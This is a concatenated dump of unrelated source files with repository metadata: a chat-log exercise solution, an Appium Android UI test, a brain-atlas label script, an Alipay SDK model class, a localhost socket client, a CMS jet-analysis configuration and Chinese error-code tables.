user_id, enter_or_leave = saved
user_name = user_name_dict[user_id]
out_str += user_name
if enter_or_leave == "Enter":
out_str += "님이 들어왔습니다."
else:
out_str += "님이 나갔습니다."
answer.append(out_str)
return answer
print(
solution(
["Enter uid1234 Muzi", "Enter uid4567 Prodo", "Leave uid1234", "Enter uid1234 Prodo", "Change uid4567 Ryan"]
)
)
|
[
"mgh3326@naver.com"
] |
mgh3326@naver.com
|
c516ca040b1f31279633585185cb1ab14a83e442
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/alwayson/testcase/firstcases/testcase4_004.py
|
e62d569b14c06d34bfb7f2fe84d450b7f3e68484
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.tomer.alwayson',
'appActivity' : 'com.tomer.alwayson.activities.PreferencesActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.tomer.alwayson/com.tomer.alwayson.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase004
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"com.tomer.alwayson:id/preview\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Support The Development\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.android.browser:id/url\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("https://www.patreon.com/user?u=2966388");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"4_004\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.tomer.alwayson'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage)
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
4985819f4fdae6c3a772431253a034ccb65fd50d
|
e7be538e812d499fd41e483313c486581ac8995c
|
/scripts/curate_cerebra_labels.py
|
2674e048eeed30c7b6f930f5f872efb99271aefc
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
templateflow/tpl-MNI152NLin2009cSym
|
7f11bbd4cdc365c7fc1e6158a6df9c3ee4d52b1e
|
69a5e68d2b276b1e46f701892ac630397f56a741
|
refs/heads/master
| 2022-01-24T16:36:35.462848
| 2022-01-04T19:34:59
| 2022-01-04T19:34:59
| 253,858,504
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
import pandas as pd
data = pd.read_csv('CerebrA_LabelDetails.csv')
right = data.copy()
left = data.copy()
# Add hemisphere column
right['hemi'] = 'R'
left['hemi'] = 'L'
# Reassign headers, drop opposite hemi column
right = right.rename(columns={'Mindboggle ID': 'name', 'Label Name': 'label', 'RH Label': 'drop', 'LH LabelsNotes': 'notes', 'Dice Kappa': 'dice/kappa'})
left = left.rename(columns={'Mindboggle ID': 'name', 'Label Name': 'drop', 'RH Label': 'label', 'LH LabelsNotes': 'notes', 'Dice Kappa': 'dice/kappa'})
right = right.drop(columns=['drop'])
left = left.drop(columns=['drop'])
# Drop index
left.index.name = 'mindboggle mapping'
right.index.name = 'mindboggle mapping'
left = left.reset_index()
right = right.reset_index()
# Merge L/R tables
curated = pd.concat((right, left)).sort_values(by=['mindboggle mapping', 'hemi'])
curated[['label', 'name', 'hemi', 'mindboggle mapping', 'dice/kappa', 'notes']].to_csv('tpl-MNI152NLin2009cSym_atlas-CerebA_dseg.tsv', sep='\t', na_rep='n/a', header=True, index=False)
|
[
"code@oscaresteban.es"
] |
code@oscaresteban.es
|
aada5ffab5800dd2c9361210ed80a88ae3ae8493
|
85e08aa6dcc83ecd33512ba453634b4eb8909638
|
/tools/new-file.py
|
f75d2681fdf30bd02aa32477c92e635046159e55
|
[
"MIT"
] |
permissive
|
full-stack-hero/snippet
|
f6f3f1c6e0a95398a4cfe088821b186512d5940e
|
9600c856c171d1296a151b4d654af0808980f939
|
refs/heads/master
| 2020-04-25T15:39:57.786782
| 2019-03-05T14:19:01
| 2019-03-05T14:19:01
| 172,886,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
import os
import datetime
title = input('Title: ')
filename = datetime.datetime.now().strftime("%Y%m%d%H%M-") + title + '.py'
url = f'https://github.com/full-stack-hero/snippet/blob/master/snippet/snippets/{filename}'
print('Create new file', filename)
with open(f'snippets/{filename}', 'w') as f:
f.write(f'# :autor: @full.stack.hero\n')
f.write(f'# :url: {url}\n\n')
|
[
"axel.juraske@short-report.de"
] |
axel.juraske@short-report.de
|
7baad3a25f85335f80301e2a2cf89fbb9dbe4349
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayEcoCityserviceCityserviceEnergySendModel.py
|
f8a6a8917786fd6a4f675b9c04236c7cbd3cb520
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,425
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.EnergyExtRequest import EnergyExtRequest
class AlipayEcoCityserviceCityserviceEnergySendModel(object):
def __init__(self):
self._ext_info = None
self._outer_no = None
self._scene = None
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
if isinstance(value, list):
self._ext_info = list()
for i in value:
if isinstance(i, EnergyExtRequest):
self._ext_info.append(i)
else:
self._ext_info.append(EnergyExtRequest.from_alipay_dict(i))
@property
def outer_no(self):
return self._outer_no
@outer_no.setter
def outer_no(self, value):
self._outer_no = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
def to_alipay_dict(self):
params = dict()
if self.ext_info:
if isinstance(self.ext_info, list):
for i in range(0, len(self.ext_info)):
element = self.ext_info[i]
if hasattr(element, 'to_alipay_dict'):
self.ext_info[i] = element.to_alipay_dict()
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.outer_no:
if hasattr(self.outer_no, 'to_alipay_dict'):
params['outer_no'] = self.outer_no.to_alipay_dict()
else:
params['outer_no'] = self.outer_no
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayEcoCityserviceCityserviceEnergySendModel()
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'outer_no' in d:
o.outer_no = d['outer_no']
if 'scene' in d:
o.scene = d['scene']
return o
|
[
"jiandong.jd@antfin.com"
] |
jiandong.jd@antfin.com
|
b2dba4a290d39607a7b51c5620c166530d270fad
|
22b348a0d10519cb1f1da5e886fdf2d3c167cf5a
|
/myweb/test/coroutine_/client.py
|
ce807f0eede3f72de22276beaab46a1d5b077f7d
|
[] |
no_license
|
liuluyang/openstack_mogan_study
|
dab0a8f918ffd17e0a747715998e81304672b75b
|
8624f765da7f5aa0c210f0fa945fc50cf8a67b9e
|
refs/heads/master
| 2021-01-19T17:03:15.370323
| 2018-04-12T09:50:38
| 2018-04-12T09:50:38
| 101,040,396
| 1
| 1
| null | 2017-11-01T02:17:31
| 2017-08-22T08:30:22
|
Python
|
UTF-8
|
Python
| false
| false
| 336
|
py
|
# -*- coding:utf-8 -*-
from socket import *
ADDR, PORT = 'localhost', 8001
client = socket(AF_INET,SOCK_STREAM)
client.connect((ADDR, PORT))
while 1:
cmd = raw_input('>>:').strip()
if len(cmd) == 0: continue
client.send(cmd)
data = client.recv(1024)
print data
#print('Received', repr(data))
#client.close()
|
[
"1120773382@qq.com"
] |
1120773382@qq.com
|
36db3029d152c25aa5180a8d9f6da3065fc2bb81
|
f31fda8014ecadf6af7d4e3392fb917c49e0352a
|
/HeavyIonsAnalysis/JetAnalysis/python/jets/akPuSoftDrop6CaloJetSequence_PbPb_mb_cff.py
|
54a4374e698b2f7c6feb0a96a2d96c43c489dd79
|
[] |
no_license
|
jniedzie/lightbylight
|
acea5051f053c49824a49a0b78bac3a2247ee75f
|
f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8
|
refs/heads/master
| 2020-03-18T12:24:31.970468
| 2018-02-09T15:50:00
| 2018-02-09T15:50:00
| 134,724,759
| 0
| 1
| null | 2018-05-24T14:11:12
| 2018-05-24T14:11:12
| null |
UTF-8
|
Python
| false
| false
| 15,716
|
py
|
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akPuSoftDrop6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPuSoftDrop6CaloJets"),
matched = cms.InputTag("ak6HiCleanedGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.6
)
akPuSoftDrop6CalomatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akSoftDrop6HiGenJets"),
matched = cms.InputTag("ak6HiCleanedGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.6
)
akPuSoftDrop6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akPuSoftDrop6CaloJets")
)
akPuSoftDrop6Calocorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPuSoftDrop6CaloJets"),
payload = "AKPu6Calo_offline"
)
akPuSoftDrop6CaloJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPuSoftDrop6CaloJets'))
#akPuSoftDrop6Caloclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak6HiCleanedGenJets'))
akPuSoftDrop6CalobTagger = bTaggers("akPuSoftDrop6Calo",0.6)
#create objects locally since they dont load properly otherwise
#akPuSoftDrop6Calomatch = akPuSoftDrop6CalobTagger.match
akPuSoftDrop6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akPuSoftDrop6CaloJets"), matched = cms.InputTag("selectedPartons"))
akPuSoftDrop6CaloPatJetFlavourAssociationLegacy = akPuSoftDrop6CalobTagger.PatJetFlavourAssociationLegacy
akPuSoftDrop6CaloPatJetPartons = akPuSoftDrop6CalobTagger.PatJetPartons
akPuSoftDrop6CaloJetTracksAssociatorAtVertex = akPuSoftDrop6CalobTagger.JetTracksAssociatorAtVertex
akPuSoftDrop6CaloJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloJetBProbabilityBJetTags = akPuSoftDrop6CalobTagger.JetBProbabilityBJetTags
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByPtBJetTags
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByIP3dBJetTags
akPuSoftDrop6CaloTrackCountingHighEffBJetTags = akPuSoftDrop6CalobTagger.TrackCountingHighEffBJetTags
akPuSoftDrop6CaloTrackCountingHighPurBJetTags = akPuSoftDrop6CalobTagger.TrackCountingHighPurBJetTags
akPuSoftDrop6CaloPatJetPartonAssociationLegacy = akPuSoftDrop6CalobTagger.PatJetPartonAssociationLegacy
akPuSoftDrop6CaloImpactParameterTagInfos = akPuSoftDrop6CalobTagger.ImpactParameterTagInfos
akPuSoftDrop6CaloImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuSoftDrop6CaloJetProbabilityBJetTags = akPuSoftDrop6CalobTagger.JetProbabilityBJetTags
akPuSoftDrop6CaloSecondaryVertexTagInfos = akPuSoftDrop6CalobTagger.SecondaryVertexTagInfos
akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.SimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.CombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloSecondaryVertexNegativeTagInfos = akPuSoftDrop6CalobTagger.SecondaryVertexNegativeTagInfos
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighEffBJetTags = akPuSoftDrop6CalobTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighPurBJetTags = akPuSoftDrop6CalobTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.NegativeCombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexBJetTags = akPuSoftDrop6CalobTagger.PositiveCombinedSecondaryVertexBJetTags
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexV2BJetTags = akPuSoftDrop6CalobTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPuSoftDrop6CaloSoftPFMuonsTagInfos = akPuSoftDrop6CalobTagger.SoftPFMuonsTagInfos
akPuSoftDrop6CaloSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuSoftDrop6CaloSoftPFMuonBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonBJetTags
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByIP3dBJetTags
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.SoftPFMuonByPtBJetTags
akPuSoftDrop6CaloNegativeSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.NegativeSoftPFMuonByPtBJetTags
akPuSoftDrop6CaloPositiveSoftPFMuonByPtBJetTags = akPuSoftDrop6CalobTagger.PositiveSoftPFMuonByPtBJetTags
akPuSoftDrop6CaloPatJetFlavourIdLegacy = cms.Sequence(akPuSoftDrop6CaloPatJetPartonAssociationLegacy*akPuSoftDrop6CaloPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPuSoftDrop6CaloPatJetFlavourAssociation = akPuSoftDrop6CalobTagger.PatJetFlavourAssociation
#akPuSoftDrop6CaloPatJetFlavourId = cms.Sequence(akPuSoftDrop6CaloPatJetPartons*akPuSoftDrop6CaloPatJetFlavourAssociation)
akPuSoftDrop6CaloJetBtaggingIP = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos *
(akPuSoftDrop6CaloTrackCountingHighEffBJetTags +
akPuSoftDrop6CaloTrackCountingHighPurBJetTags +
akPuSoftDrop6CaloJetProbabilityBJetTags +
akPuSoftDrop6CaloJetBProbabilityBJetTags
)
)
akPuSoftDrop6CaloJetBtaggingSV = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos
*
akPuSoftDrop6CaloSecondaryVertexTagInfos
* (akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags+
akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags+
akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags
)
)
akPuSoftDrop6CaloJetBtaggingNegSV = cms.Sequence(akPuSoftDrop6CaloImpactParameterTagInfos
*
akPuSoftDrop6CaloSecondaryVertexNegativeTagInfos
* (akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighEffBJetTags+
akPuSoftDrop6CaloNegativeSimpleSecondaryVertexHighPurBJetTags+
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexBJetTags+
akPuSoftDrop6CaloNegativeCombinedSecondaryVertexV2BJetTags+
akPuSoftDrop6CaloPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPuSoftDrop6CaloJetBtaggingMu = cms.Sequence(akPuSoftDrop6CaloSoftPFMuonsTagInfos * (akPuSoftDrop6CaloSoftPFMuonBJetTags
+
akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags
+
akPuSoftDrop6CaloSoftPFMuonByPtBJetTags
+
akPuSoftDrop6CaloNegativeSoftPFMuonByPtBJetTags
+
akPuSoftDrop6CaloPositiveSoftPFMuonByPtBJetTags
)
)
akPuSoftDrop6CaloJetBtagging = cms.Sequence(akPuSoftDrop6CaloJetBtaggingIP
*akPuSoftDrop6CaloJetBtaggingSV
*akPuSoftDrop6CaloJetBtaggingNegSV
# *akPuSoftDrop6CaloJetBtaggingMu
)
akPuSoftDrop6CalopatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPuSoftDrop6CaloJets"),
genJetMatch = cms.InputTag("akPuSoftDrop6Calomatch"),
genPartonMatch = cms.InputTag("akPuSoftDrop6Caloparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPuSoftDrop6Calocorr")),
JetPartonMapSource = cms.InputTag("akPuSoftDrop6CaloPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPuSoftDrop6CaloPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPuSoftDrop6CaloJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPuSoftDrop6CaloSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPuSoftDrop6CaloSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPuSoftDrop6CaloCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPuSoftDrop6CaloCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPuSoftDrop6CaloJetBProbabilityBJetTags"),
cms.InputTag("akPuSoftDrop6CaloJetProbabilityBJetTags"),
#cms.InputTag("akPuSoftDrop6CaloSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPuSoftDrop6CaloSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPuSoftDrop6CaloTrackCountingHighEffBJetTags"),
cms.InputTag("akPuSoftDrop6CaloTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPuSoftDrop6CaloJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPuSoftDrop6CaloNjettiness = Njettiness.clone(
src = cms.InputTag("akPuSoftDrop6CaloJets"),
R0 = cms.double( 0.6)
)
akPuSoftDrop6CalopatJetsWithBtagging.userData.userFloats.src += ['akPuSoftDrop6CaloNjettiness:tau1','akPuSoftDrop6CaloNjettiness:tau2','akPuSoftDrop6CaloNjettiness:tau3']
akPuSoftDrop6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPuSoftDrop6CalopatJetsWithBtagging"),
genjetTag = 'ak6HiGenJets',
rParam = 0.6,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPuSoftDrop6Calo"),
jetName = cms.untracked.string("akPuSoftDrop6Calo"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akSoftDrop6GenJets"),
doGenTaus = True
)
akPuSoftDrop6CaloJetSequence_mc = cms.Sequence(
#akPuSoftDrop6Caloclean
#*
akPuSoftDrop6Calomatch
#*
#akPuSoftDrop6CalomatchGroomed
*
akPuSoftDrop6Caloparton
*
akPuSoftDrop6Calocorr
*
#akPuSoftDrop6CaloJetID
#*
akPuSoftDrop6CaloPatJetFlavourIdLegacy
#*
#akPuSoftDrop6CaloPatJetFlavourId # Use legacy algo till PU implemented
*
akPuSoftDrop6CaloJetTracksAssociatorAtVertex
*
akPuSoftDrop6CaloJetBtagging
*
akPuSoftDrop6CaloNjettiness
*
akPuSoftDrop6CalopatJetsWithBtagging
*
akPuSoftDrop6CaloJetAnalyzer
)
akPuSoftDrop6CaloJetSequence_data = cms.Sequence(akPuSoftDrop6Calocorr
*
#akPuSoftDrop6CaloJetID
#*
akPuSoftDrop6CaloJetTracksAssociatorAtVertex
*
akPuSoftDrop6CaloJetBtagging
*
akPuSoftDrop6CaloNjettiness
*
akPuSoftDrop6CalopatJetsWithBtagging
*
akPuSoftDrop6CaloJetAnalyzer
)
akPuSoftDrop6CaloJetSequence_jec = cms.Sequence(akPuSoftDrop6CaloJetSequence_mc)
akPuSoftDrop6CaloJetSequence_mb = cms.Sequence(akPuSoftDrop6CaloJetSequence_mc)
akPuSoftDrop6CaloJetSequence = cms.Sequence(akPuSoftDrop6CaloJetSequence_mb)
|
[
"rchudasa@cern.ch"
] |
rchudasa@cern.ch
|
dc42d8e89404cf9af6ce1eb141a5c7628715b53b
|
8195f2c3a3b46a3b01571bcbc33960290fce3f32
|
/biz/errors.py
|
6511688a69bf2bd05d4f59a6e320e8e807cc7c69
|
[] |
no_license
|
adoggie/camel
|
e391e5544a1602ab43257b255dd6558bcc0ee3b1
|
24b4e9b397ca68b8d4d21be7c372b8163a6ca678
|
refs/heads/master
| 2021-01-18T20:27:55.172148
| 2017-05-22T14:19:57
| 2017-05-22T14:19:57
| 86,969,529
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,050
|
py
|
#coding:utf-8
from camel.fundamental.errors import hash_object,ErrorEntry
class ErrorDefs:
__ver__ =u'1.0'
__BASE__ = 0
SUCC = ErrorEntry(0, u'成功')
class ErrorDefsDispatcher:
__ver__ = u'1.0'
__BASE__ = 10000
OK = ErrorEntry(1000, u'success成功')
DB_ERROR = ErrorEntry(1001, u'数据库错误')
LOGIN_FAIL = ErrorEntry(1002, u'登录失败')
REPEAT_TIC = ErrorEntry(1003, u'')
SERVER_ERR = ErrorEntry(1004, u'服务器错误')
REFRESH = ErrorEntry(1005, u'')
TRANS_OK = ErrorEntry(1006, u'')
TRUCK_IS_ONWAY = ErrorEntry(1007, u'车辆正在运输中')
UNKNOW_DEVICE = ErrorEntry(1008, u'未知设备,仅支持web登录')
AUTH_FAIL = ErrorEntry(1100, u'鉴权失败')
NO_TOKEN = ErrorEntry(1101, u'没有TOKEN')
NO_USER = ErrorEntry(1102, u'没有用户')
TOKEN_INVALID = ErrorEntry(1103, u'token已失效')
NO_VOUCHER = ErrorEntry(1104, u'票据获取失败')
USER_NOT_ACTIVE = ErrorEntry(1201, u'用户未激活')
RESET_PWD_FAIL = ErrorEntry(1202, u'重置密码错误')
USER_UP_ERR = ErrorEntry(1203, u'用户更新错误')
USER_NO_AUTHORIZATION = ErrorEntry(1204, u'用户无权限')
NO_DRIVER = ErrorEntry(1300, u'司机用户不存在')
NO_GROUP_STATUS = ErrorEntry(1301, u'不存在此状态组')
NO_TNUMBER = ErrorEntry(1302, u'无此订单')
INVALID_STATUS = ErrorEntry(1303, u'运单状态无效')
VALUE_ERROR = ErrorEntry(1304, u'参数值错误')
TRANS_DATA_CHANGED = ErrorEntry(1305, u'运单状态被改变')
TRANS_STATUS_CHANGE_FAIL = ErrorEntry(1306, u'运单状态改变失败')
LOCATION_NOT_IN_TRANS = ErrorEntry(1307, u'该地点不存在运单中')
TRANS_FINISHED = ErrorEntry(1308, u'运单已完成,异常上报失败')
TRANS_IS_EXIST = ErrorEntry(1309, u'运单号已存在')
PLATE_NO_TRANS = ErrorEntry(1310, u'此车牌无正在进行中的运单')
NO_LOCATION = ErrorEntry(1401, u'没有此location编码')
NOTE_EXIST = ErrorEntry(1402, u'重复添加note')
RECORD_EXIST = ErrorEntry(1403, u'重复补录操作')
TRANS_STATUS_ERROR = ErrorEntry(1404, u'运单状态错误')
DRIVER_QR_RELA_FAILED = ErrorEntry(1501, u'车牌已有司机绑定')
DRIVER_QR_CODE_INVALID = ErrorEntry(1502, u'无效的司机二维码')
DRIVER_QR_CODE_EXPIRED = ErrorEntry(1503, u'司机二维码已过期')
NO_TRUCK = ErrorEntry(1601, u'车辆不存在')
NO_QR_RS = ErrorEntry(1701, u'车辆未绑定司机')
NO_LINE = ErrorEntry(1702, u'线路不存在')
DRIVER_HAS_BOUND_PLATE = ErrorEntry(1703, u'司机已绑定车牌')
NO_CQ = ErrorEntry(1704, u'未获取到车签号')
CQ_IS_EXIST = ErrorEntry(1801, u'车签已存在')
PLATE_NO_SAME = ErrorEntry(1802, u'建立关联关系的两个运单车牌不一致')
TRANS_HAVE_LINKED = ErrorEntry(1803, u'运单已经被关联')
TIME_MATCH_ERROR = ErrorEntry(1804, u'客户端时间与服务器时间不匹配')
class ErrorDefsDriver:
__ver__ =u'1.0'
__BASE__ = 20000
OK = ErrorEntry( 1000 ,u'success成功')
DB_ERROR = ErrorEntry( 1001 ,u'服务器打了个盹')
SERVER_ERR = ErrorEntry( 1004 ,u'服务器开小差啦')
REFRESH = ErrorEntry( 1005 ,u'刷新回调')
NO_PERMIT = ErrorEntry( 1008 ,u'未获取到运单信息')
AUTH_FAIL = ErrorEntry( 1100 ,u'密码输入错误,请重新输入')
TOKEN_INVALID = ErrorEntry( 1101 ,u'您的帐号登录已过期失效,请重新登录')
NO_USER = TOKEN_INVALID
NO_DRIVER = TOKEN_INVALID
NO_USER_EXIST = ErrorEntry( 1102 ,u'该手机号未注册')
NO_DRIVER_EXIST = NO_USER_EXIST
USER_OUT = ErrorEntry( 1103 ,u'您的帐号已在其他手机登录')
